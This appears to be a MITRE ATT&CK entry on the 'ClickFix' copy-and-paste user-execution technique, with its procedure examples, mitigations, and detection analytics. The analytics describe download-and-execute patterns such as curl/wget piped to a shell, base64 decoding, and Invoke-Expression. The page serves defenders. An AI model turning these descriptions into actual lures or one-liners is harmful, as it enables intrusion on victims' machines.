| ID | Name |
|---|---|
| T1204.001 | Malicious Link |
| T1204.002 | Malicious File |
| T1204.003 | Malicious Image |
| T1204.004 | Malicious Copy and Paste |
| T1204.005 | Malicious Library |
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter. One such strategy is "ClickFix," in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code.
Malicious websites, such as those used in Drive-by Compromise, may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.[1][2][3][4]
Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution, consistent with the "ClickFix" strategy.[5][6]
Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.
| ID | Name | Description |
|---|---|---|
| G1052 | Contagious Interview |
Contagious Interview has leveraged ClickFix type tactics enticing victims to copy and paste malicious code.[7][2][8] |
| S1229 | Havoc |
The Havoc infection chain has been initiated via ClickFix lures in phishing emails.[9] |
| ID | Mitigation | Description |
|---|---|---|
| M1038 | Execution Prevention |
Use application control where appropriate. PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., |
| M1031 | Network Intrusion Prevention |
If a link is being requested by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity. |
| M1021 | Restrict Web-Based Content |
If a link is being requested by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as |
| ID | Name | Analytic ID | Analytic Description |
|---|---|---|---|
| DET0340 | User Execution – Malicious Copy & Paste (browser/email → shell with obfuscated one-liner) – T1204.004 | AN0962 |
A user is socially engineered (web page, email, document) to open Run/PowerShell/CMD and paste an obfuscated one-liner. The chain is: (1) user context active in a browser/email/office app → (2) process creation of a command interpreter with suspicious arguments (base64/Invoke-Expression/web download/pipeline to shell) → (3) optional file drop in %TEMP% or %APPDATA% → (4) outbound network connection to an external domain. Events are correlated within a short window and with consistent user/session. |
| AN0963 |
User pastes a multi-line or one-liner into a terminal (bash/zsh) that downloads/decodes and executes content. Chain: terminal exec of curl/wget/bash/sh with pipe to interpreter or base64-decode → transient file under /tmp|~/.cache → immediate outbound egress. |
||
| AN0964 |
User pastes an obfuscated command into Terminal.app/iTerm2 that decodes or downloads code and executes. Detects Terminal/iTerm2 spawning bash/zsh/python with suspicious pipeline/base64 patterns followed by file writes in ~/Library or /tmp and outbound network connections. |